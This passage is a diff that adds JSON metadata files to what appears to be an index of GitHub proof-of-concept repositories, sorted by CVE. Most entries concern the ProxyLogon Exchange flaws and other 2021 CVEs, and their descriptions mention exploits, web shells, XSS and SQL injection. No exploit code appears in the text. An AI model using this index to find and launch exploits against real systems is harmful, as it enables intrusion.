"https:\/\/github.com\/Nick-Yin12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nick-Yin12\/106362522", + "description": "針對近期微軟公布修補遭駭客攻擊的Exchange Server漏洞問題,台灣DEVCORE表示早在1月5日便已發現安全漏洞後,並且向微軟通報此項編號命名為「CVE-2021-26855 」,以及「CVE-2021-27065」的零日漏洞,同時也將此項漏洞稱為「ProxyLogon」。 此次揭露的「ProxyLogon」漏洞,是以無需驗證即可使用的遠端程式碼執行 (Pre-Auth Remote Code Execution;Pre-Auth RCE)零日漏洞(Zero-day exploit),可讓攻擊者得以繞過身份驗證步驟,驅使系統管理員協助執行惡意文件或執行指令,進而觸發更廣泛的攻擊。 「ProxyLogon」是微軟近期被揭露最重大的RCE漏洞之一,DEVCORE團隊遵循責任揭露 (Responsible Disclosure)原則,在發現後便第一時間立即於今年1月5日通報微軟進行修補,避免該漏洞遭有心人士利用,造成全球用戶重大損失。而微軟遂於3月2日針對相關漏洞釋出安全更新,避免用戶機敏資訊遭受惡意攻擊。個人想法:遭駭客攻擊的Exchange Server漏洞問題,台灣DEVCORE表示早在1月5日便已發現,並且向微軟通報此項編號命名為「CVE-2021-26855 」,以及「CVE-2021-27065」的零日漏洞,同時也將此項漏洞稱為「ProxyLogon」。 此次揭露的「ProxyLogon」漏洞,是以無需驗證即可使用的遠端程式碼執行 (Pre-Auth Remote Code Execution;Pre-Auth RCE)零日漏洞(Zero-day exploit),可讓攻擊者得以繞過身份驗證步驟,驅使系統管理員協助執行惡意文件或執行指令,進而觸發更廣泛的攻擊。 「ProxyLogon」是微軟近期被揭露最重大的RCE漏洞之一,DEVCORE團隊遵循責任揭露 (Responsible Disclosure)原則,在發現後便第一時間立即於今年1月5日通報微軟進行修補,避免該漏洞遭有心人士利用,造成全球用戶重大損失。而微軟遂於3月2日針對相關漏洞釋出安全更新,避免用戶機敏資訊遭受惡意攻擊。個人想法:微軟是大眾常用的軟體之一,駭客只要察覺漏洞就會進行惡意的攻擊,微軟公布4個Exchange Server的安全漏洞後,就遭受駭客的惡意攻擊,這件事的發生,微軟需更加小心並提高資安的防護。", + "fork": false, + "created_at": "2021-04-19T09:33:52Z", + "updated_at": "2021-04-19T09:35:18Z", + "pushed_at": "2021-04-19T09:35:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422862938, + "name": "Flangvik", + "full_name": "yaoxiaoangry3\/Flangvik", + "owner": { + "login": "yaoxiaoangry3", + "id": 93431453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93431453?v=4", + "html_url": "https:\/\/github.com\/yaoxiaoangry3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaoxiaoangry3\/Flangvik", + "description": "C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…", + "fork": false, + "created_at": "2021-10-30T11:31:48Z", + "updated_at": "2021-10-30T11:31:52Z", + "pushed_at": "2021-10-30T11:31:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 435023930, + "name": "poc_proxylogon", + "full_name": "thau0x01\/poc_proxylogon", + "owner": { + "login": "thau0x01", + "id": 8220038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8220038?v=4", + "html_url": "https:\/\/github.com\/thau0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thau0x01\/poc_proxylogon", + "description": "Microsoft Exchange ProxyLogon PoC (CVE-2021-26855)", + "fork": false, + "created_at": "2021-12-04T22:38:30Z", + "updated_at": "2024-02-29T20:23:44Z", + "pushed_at": "2022-02-10T15:20:42Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 500657432, + "name": "Flangvik", + "full_name": "1342486672\/Flangvik", + "owner": { + "login": "1342486672", + "id": 107014850, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107014850?v=4", + "html_url": "https:\/\/github.com\/1342486672", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1342486672\/Flangvik", + "description": "C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…", + "fork": false, + "created_at": "2022-06-07T02:09:10Z", + "updated_at": "2022-06-07T02:09:10Z", + "pushed_at": "2022-06-07T02:09:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 507096297, + "name": "ExchangeSmash", + "full_name": "TheDudeD6\/ExchangeSmash", + "owner": { + "login": "TheDudeD6", + "id": 108148004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108148004?v=4", + "html_url": "https:\/\/github.com\/TheDudeD6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheDudeD6\/ExchangeSmash", + "description": "CVE-2021-26855", + "fork": false, + "created_at": "2022-06-24T17:42:28Z", + "updated_at": "2022-06-24T17:42:46Z", + "pushed_at": "2022-06-24T17:42:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 507818569, + "name": "ProxyLogon", + "full_name": "kh4sh3i\/ProxyLogon", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/ProxyLogon", + "description": "ProxyLogon (CVE-2021-26855+CVE-2021-27065) Exchange Server RCE (SSRF->GetWebShell)", + "fork": false, + "created_at": "2022-06-27T08:07:48Z", + "updated_at": "2024-10-10T16:37:19Z", + "pushed_at": "2023-03-28T19:07:50Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "2021-27065", + "cve", + "cve-2021-26855", + "exchange", + "exchange-server", + "exploit", + "microsoft", + "microsoft-exchange-proxylogon", + "outlook", + "proxylogon", + "zeroday" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 596567126, + "name": "Microsoft-Exchange-RCE", + "full_name": "ssrsec\/Microsoft-Exchange-RCE", + "owner": { + "login": "ssrsec", + "id": 48439183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48439183?v=4", + "html_url": "https:\/\/github.com\/ssrsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssrsec\/Microsoft-Exchange-RCE", + "description": "Microsoft Exchange CVE-2021-26855&CVE-2021-27065", + "fork": false, + "created_at": "2023-02-02T13:20:45Z", + "updated_at": "2023-02-03T02:40:14Z", + "pushed_at": "2023-02-02T13:24:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 631719735, + "name": "ProxyLogon-CVE-2021-26855", + "full_name": "glen-pearson\/ProxyLogon-CVE-2021-26855", + "owner": { + "login": "glen-pearson", + "id": 49351264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49351264?v=4", + "html_url": "https:\/\/github.com\/glen-pearson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glen-pearson\/ProxyLogon-CVE-2021-26855", + "description": null, + "fork": false, + "created_at": "2023-04-23T22:26:45Z", + "updated_at": "2024-06-28T18:52:14Z", + "pushed_at": "2024-06-28T17:47:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 632273646, + "name": "cve-2021-26855", + "full_name": "MacAsure\/cve-2021-26855", + "owner": { + "login": "MacAsure", + "id": 110767603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110767603?v=4", + "html_url": "https:\/\/github.com\/MacAsure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MacAsure\/cve-2021-26855", + "description": null, + "fork": false, + "created_at": "2023-04-25T04:29:35Z", + "updated_at": "2023-04-25T04:29:36Z", + "pushed_at": "2023-04-25T04:31:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739156681, + "name": "testanull-CVE-2021-26855_read_poc.txt", + "full_name": "timb-machine-mirrors\/testanull-CVE-2021-26855_read_poc.txt", + "owner": { + "login": "timb-machine-mirrors", + "id": 49810875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4", + "html_url": "https:\/\/github.com\/timb-machine-mirrors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timb-machine-mirrors\/testanull-CVE-2021-26855_read_poc.txt", + "description": "Clone from gist", + "fork": false, + "created_at": "2024-01-04T22:48:21Z", + "updated_at": "2024-01-04T22:50:51Z", + "pushed_at": "2024-01-04T22:48:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26856.json b/2021/CVE-2021-26856.json new file mode 100644 index 0000000000..a72f3137e9 --- /dev/null +++ b/2021/CVE-2021-26856.json @@ -0,0 +1,33 @@ +[ + { + "id": 346483081, + "name": "CVE-2021-26856", + "full_name": "avi8892\/CVE-2021-26856", + "owner": { + "login": "avi8892", + "id": 31028818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31028818?v=4", + "html_url": "https:\/\/github.com\/avi8892", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/avi8892\/CVE-2021-26856", + "description": null, + "fork": false, + "created_at": "2021-03-10T20:27:27Z", + "updated_at": "2022-01-13T16:20:46Z", + "pushed_at": "2021-03-10T12:46:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26857.json b/2021/CVE-2021-26857.json new file mode 100644 index 0000000000..1842d3237f --- /dev/null +++ b/2021/CVE-2021-26857.json @@ -0,0 +1,33 @@ +[ + { + "id": 346784494, + "name": "Proxylogon-exploit", + "full_name": "sirpedrotavares\/Proxylogon-exploit", + "owner": { + "login": "sirpedrotavares", + "id": 10796859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10796859?v=4", + "html_url": "https:\/\/github.com\/sirpedrotavares", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sirpedrotavares\/Proxylogon-exploit", + "description": "proxylogon exploit - CVE-2021-26857", + "fork": false, + "created_at": "2021-03-11T17:32:32Z", + "updated_at": "2024-08-12T20:11:07Z", + "pushed_at": "2021-03-11T17:34:15Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 113, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26868.json b/2021/CVE-2021-26868.json new file mode 100644 index 0000000000..4a06cfe374 --- /dev/null +++ b/2021/CVE-2021-26868.json @@ -0,0 +1,33 @@ +[ + { + "id": 361973988, + "name": "CVE-2021-26868", + "full_name": "KangD1W2\/CVE-2021-26868", + "owner": { + "login": "KangD1W2", + "id": 39058866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39058866?v=4", + "html_url": "https:\/\/github.com\/KangD1W2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KangD1W2\/CVE-2021-26868", + "description": null, + "fork": false, + "created_at": "2021-04-27T03:55:38Z", + "updated_at": "2024-01-17T16:03:18Z", + "pushed_at": "2021-04-26T14:23:48Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26871.json b/2021/CVE-2021-26871.json new file mode 100644 index 0000000000..d12ce4af9e --- /dev/null +++ b/2021/CVE-2021-26871.json @@ -0,0 +1,33 @@ +[ + { + "id": 351287174, + "name": "CVE-2021-26871_POC", + "full_name": "fr4nkxixi\/CVE-2021-26871_POC", + "owner": { + "login": "fr4nkxixi", + "id": 81340681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81340681?v=4", + "html_url": "https:\/\/github.com\/fr4nkxixi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fr4nkxixi\/CVE-2021-26871_POC", + "description": "POC for CVE-2021-26871(Maybe)", + "fork": false, + "created_at": "2021-03-25T02:38:08Z", + "updated_at": "2024-08-12T20:11:31Z", + "pushed_at": "2021-03-25T03:15:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26882.json b/2021/CVE-2021-26882.json new file mode 100644 index 0000000000..fb8ecfda5c --- /dev/null +++ b/2021/CVE-2021-26882.json @@ -0,0 +1,33 @@ +[ + { + "id": 346986729, + "name": "CVE-2021-26882", + "full_name": "taiji-xo\/CVE-2021-26882", + "owner": { + "login": "taiji-xo", + "id": 18670013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18670013?v=4", + "html_url": "https:\/\/github.com\/taiji-xo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taiji-xo\/CVE-2021-26882", + "description": "PoC", + "fork": false, + "created_at": "2021-03-12T07:58:57Z", + "updated_at": "2023-05-10T08:23:12Z", + "pushed_at": "2021-03-11T14:01:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-268855.json b/2021/CVE-2021-268855.json new file mode 100644 index 0000000000..80efa14008 --- /dev/null +++ b/2021/CVE-2021-268855.json @@ -0,0 +1,33 @@ +[ + { + "id": 573157644, + "name": "CVE-2021-268855", + "full_name": "sikkertech\/CVE-2021-268855", + "owner": { + "login": "sikkertech", + "id": 74667436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74667436?v=4", + "html_url": "https:\/\/github.com\/sikkertech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sikkertech\/CVE-2021-268855", + "description": "Exploiting Microsoft CVE-2021-268855 in Exchange (Getting RCE)", + "fork": false, + "created_at": "2022-12-01T20:30:56Z", + "updated_at": "2023-01-13T18:04:46Z", + "pushed_at": "2022-12-01T20:39:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26903.json b/2021/CVE-2021-26903.json new file mode 100644 index 0000000000..254766f290 --- /dev/null +++ b/2021/CVE-2021-26903.json @@ -0,0 +1,33 @@ +[ + { + "id": 341895421, + "name": "CVE-2021-26903", + "full_name": "Security-AVS\/CVE-2021-26903", + "owner": { + "login": "Security-AVS", + "id": 72926885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4", + "html_url": "https:\/\/github.com\/Security-AVS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2021-26903", + "description": "ISIDA RETRIEVER v5.2\" Reflected XSS", + "fork": false, + "created_at": "2021-02-24T12:36:01Z", + "updated_at": "2021-02-24T12:40:09Z", + "pushed_at": "2021-02-24T12:40:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26904.json b/2021/CVE-2021-26904.json new file mode 100644 index 0000000000..f6a8c48b5a --- /dev/null +++ b/2021/CVE-2021-26904.json @@ -0,0 +1,33 @@ +[ + { + "id": 341897194, + "name": "-CVE-2021-26904", + "full_name": "Security-AVS\/-CVE-2021-26904", + "owner": { + "login": "Security-AVS", + "id": 72926885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4", + "html_url": "https:\/\/github.com\/Security-AVS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Security-AVS\/-CVE-2021-26904", + "description": "LMA ISIDA Retriever 5.2 allows SQL Injection", + "fork": false, + "created_at": "2021-02-24T12:42:52Z", + "updated_at": "2021-02-24T12:43:56Z", + "pushed_at": "2021-02-24T12:43:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26943.json b/2021/CVE-2021-26943.json new file mode 100644 index 0000000000..74b883c1d4 --- /dev/null +++ b/2021/CVE-2021-26943.json @@ -0,0 +1,37 @@ +[ + { + "id": 325836310, + "name": "SmmExploit", + "full_name": "tandasat\/SmmExploit", + "owner": { + "login": "tandasat", + "id": 1620923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4", + "html_url": "https:\/\/github.com\/tandasat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tandasat\/SmmExploit", + "description": "The report and the exploit of CVE-2021-26943, the kernel-to-SMM local privilege escalation vulnerability in ASUS UX360CA BIOS version 303.", + "fork": false, + "created_at": "2020-12-31T16:30:02Z", + "updated_at": "2024-10-06T05:32:37Z", + "pushed_at": "2021-03-29T12:33:38Z", + "stargazers_count": 134, + "watchers_count": 134, + "has_discussions": true, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "smm", + "uefi", + "vulnerability" + ], + "visibility": "public", + "forks": 23, + "watchers": 134, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27065.json b/2021/CVE-2021-27065.json new file mode 100644 index 0000000000..f6b0bb8c5e --- /dev/null +++ b/2021/CVE-2021-27065.json @@ -0,0 +1,33 @@ +[ + { + "id": 345007574, + "name": "cve-2021-27065", + "full_name": "adamrpostjr\/cve-2021-27065", + "owner": { + "login": "adamrpostjr", + "id": 32047648, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32047648?v=4", + "html_url": "https:\/\/github.com\/adamrpostjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adamrpostjr\/cve-2021-27065", + "description": "Quick One Line Powershell scripts to detect for webshells, possible zips, and logs.", + "fork": false, + "created_at": "2021-03-06T04:47:35Z", + "updated_at": "2022-08-10T02:52:35Z", + "pushed_at": "2021-03-09T13:23:08Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27180.json b/2021/CVE-2021-27180.json new file mode 100644 index 0000000000..acb98d7e3e --- /dev/null +++ b/2021/CVE-2021-27180.json @@ -0,0 +1,33 @@ +[ + { + "id": 356335946, + "name": "MDaemon-Advisories", + "full_name": "chudyPB\/MDaemon-Advisories", + "owner": { + "login": "chudyPB", + "id": 36897432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36897432?v=4", + "html_url": "https:\/\/github.com\/chudyPB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chudyPB\/MDaemon-Advisories", + "description": "MDaemon Advisories - CVE-2021-27180, CVE-2021-27181, CVE-2021-27182, CVE-2021-27183", + "fork": false, + "created_at": "2021-04-09T16:34:28Z", + "updated_at": "2024-10-26T15:24:02Z", + "pushed_at": "2024-02-03T10:29:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27187.json b/2021/CVE-2021-27187.json new file mode 100644 index 0000000000..89a77df77d --- /dev/null +++ b/2021/CVE-2021-27187.json @@ -0,0 +1,33 @@ +[ + { + "id": 338061784, + "name": "CVE-2021-27187", + "full_name": "jet-pentest\/CVE-2021-27187", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-27187", + "description": null, + "fork": false, + "created_at": "2021-02-11T15:03:48Z", + "updated_at": "2021-02-14T09:24:04Z", + "pushed_at": "2021-02-11T15:08:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27188.json b/2021/CVE-2021-27188.json new file mode 100644 index 0000000000..4c0d09ec40 --- /dev/null +++ b/2021/CVE-2021-27188.json @@ -0,0 +1,33 @@ +[ + { + "id": 338251533, + "name": "CVE-2021-27188", + "full_name": "jet-pentest\/CVE-2021-27188", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-27188", + "description": null, + "fork": false, + "created_at": "2021-02-12T07:32:51Z", + "updated_at": "2021-02-14T09:24:02Z", + "pushed_at": "2021-02-12T07:36:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27190.json b/2021/CVE-2021-27190.json new file mode 100644 index 0000000000..16f3ceaac4 --- /dev/null +++ b/2021/CVE-2021-27190.json @@ -0,0 +1,33 @@ +[ + { + "id": 337955124, + "name": "CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS", + "full_name": "anmolksachan\/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS", + "owner": { + "login": "anmolksachan", + "id": 60771253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60771253?v=4", + "html_url": "https:\/\/github.com\/anmolksachan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anmolksachan\/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS", + "description": null, + "fork": false, + "created_at": "2021-02-11T07:10:58Z", + "updated_at": "2024-11-21T16:00:51Z", + "pushed_at": "2021-02-12T07:32:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27198.json b/2021/CVE-2021-27198.json new file mode 100644 index 0000000000..e707ca2c77 --- /dev/null +++ b/2021/CVE-2021-27198.json @@ -0,0 +1,33 @@ +[ + { + "id": 709582719, + "name": "CVE-2021-27198", + "full_name": "rwincey\/CVE-2021-27198", + "owner": { + "login": "rwincey", + "id": 5438659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5438659?v=4", + "html_url": "https:\/\/github.com\/rwincey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rwincey\/CVE-2021-27198", + "description": null, + "fork": false, + "created_at": "2023-10-25T01:22:07Z", + "updated_at": "2023-10-25T01:28:07Z", + "pushed_at": "2023-10-25T11:12:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27211.json b/2021/CVE-2021-27211.json new file mode 100644 index 0000000000..999cc7b5c3 --- /dev/null +++ b/2021/CVE-2021-27211.json @@ -0,0 +1,33 @@ +[ + { + "id": 339161320, + "name": "stegcrack", + "full_name": "b4shfire\/stegcrack", + "owner": { + "login": "b4shfire", + "id": 58707942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58707942?v=4", + "html_url": "https:\/\/github.com\/b4shfire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4shfire\/stegcrack", + "description": "Exploit script for CVE-2021-27211", + "fork": false, + "created_at": "2021-02-15T17:54:49Z", + "updated_at": "2023-02-04T17:58:23Z", + "pushed_at": "2022-01-17T17:33:20Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27246.json b/2021/CVE-2021-27246.json new file mode 100644 index 0000000000..0d35f21e1f --- /dev/null +++ b/2021/CVE-2021-27246.json @@ -0,0 +1,33 @@ +[ + { + "id": 343487613, + "name": "CVE-2021-27246_Pwn2Own2020", + "full_name": "synacktiv\/CVE-2021-27246_Pwn2Own2020", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-27246_Pwn2Own2020", + "description": null, + "fork": false, + "created_at": "2021-03-01T16:45:42Z", + "updated_at": "2024-11-24T15:43:34Z", + "pushed_at": "2021-03-02T07:45:20Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 42, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27328.json b/2021/CVE-2021-27328.json new file mode 100644 index 0000000000..5ed5e70a3f --- /dev/null +++ b/2021/CVE-2021-27328.json @@ -0,0 +1,33 @@ +[ + { + "id": 340288345, + "name": "CVE-2021-27328", + "full_name": "SQSamir\/CVE-2021-27328", + "owner": { + "login": "SQSamir", + "id": 12712312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12712312?v=4", + "html_url": "https:\/\/github.com\/SQSamir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SQSamir\/CVE-2021-27328", + "description": null, + "fork": false, + "created_at": "2021-02-19T07:15:48Z", + "updated_at": "2021-02-19T08:16:14Z", + "pushed_at": "2021-02-19T08:16:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + 